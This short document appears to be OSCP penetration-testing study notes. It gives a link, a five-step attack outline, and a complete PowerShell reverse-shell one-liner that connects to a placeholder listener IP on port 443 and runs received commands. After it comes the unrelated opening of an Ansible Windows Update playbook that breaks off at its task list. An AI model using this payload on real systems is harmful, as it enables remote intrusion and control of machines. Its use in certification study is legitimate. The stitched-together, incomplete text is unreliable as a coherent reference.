UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
- Recon
- Find vuln
- Exploit
- Escalate
- Document it
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
---
# Ansible playbook to run Windows Update and restart, if required
#
# http://docs.ansible.com/ansible/win_updates_module.html
# https://docs.ansible.com/ansible/win_reboot_module.html
- name: Windows Update
  hosts: all
  gather_facts: false
  tasks: